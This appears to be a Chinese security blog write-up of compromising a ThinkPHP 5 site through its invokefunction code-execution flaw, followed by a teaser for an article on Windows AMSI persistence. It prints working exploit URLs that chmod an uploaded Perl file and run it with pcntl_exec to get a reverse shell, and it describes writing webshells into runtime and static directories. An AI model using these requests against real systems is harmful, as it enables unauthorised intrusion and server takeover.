记一次在tp5代码执行下的pcntl_exec瞎操作

  • Comments Off on 记一次在tp5代码执行下的pcntl_exec瞎操作
  • 29 views
  • A+
所属分类:安全文章
chmod 没法设置权限,默认没有执行权限,chmod第二个参数只能传八进制,但这里只能传字符串。但可以利用弱类型自动转换来

记一次在tp5代码执行下的pcntl_exec瞎操作

字符串511-》十进制511 等同于八进制0755

1

/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=chmod&vars[1][]=/tmp/ss1.perl&vars[1][]=511

执行命令

1

/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=pcntl_exec&vars[1][]=/tmp/ss1.perl

由于有cdn,可能没生成成功,用intruder爆破批量生成维持一下,成功反弹shell

记一次在tp5代码执行下的pcntl_exec瞎操作

0x02 后续

反弹shell之后看了一下,发现根本没有public目录,这个/home/wwwroot/example就是根目录,很明显之前脑子出问题了

runtime目录是可以直接访问的,static/img目录下也是有权限的,直接利用file_input_contents写进去就完事了

记一次在tp5代码执行下的pcntl_exec瞎操作

 因为cdn的问题,会访问不了,用intruder 设置null payloads批量生成一下,访问getshell

记一次在tp5代码执行下的pcntl_exec瞎操作

 0x03 总结

 

拿下才发现,其实早之前就可以getshell了,之前已经写shell到runtime了,因为误判以为runtime目录访问不到,加上cdn的佐证,一直想着包含getshell,但包含不了。最后走上了pcntl_exec这条不归路

才导致后续这一系列瞎操作,但通过pcntl_exec反弹shell还是很香的,在web目录限制没有办法访问shell或者没地方写入的时候

相关推荐: Windows权限维持-AMSI

AMSIAMSI是Windows下的一个接口,全称是Anti-Malware Scan Interface,叫反恶意软件扫描接口,用来检测恶意程序的。例如Windows Defender就会和AMSI API进行交互,大概过程是这样的:比如要执行一段Power…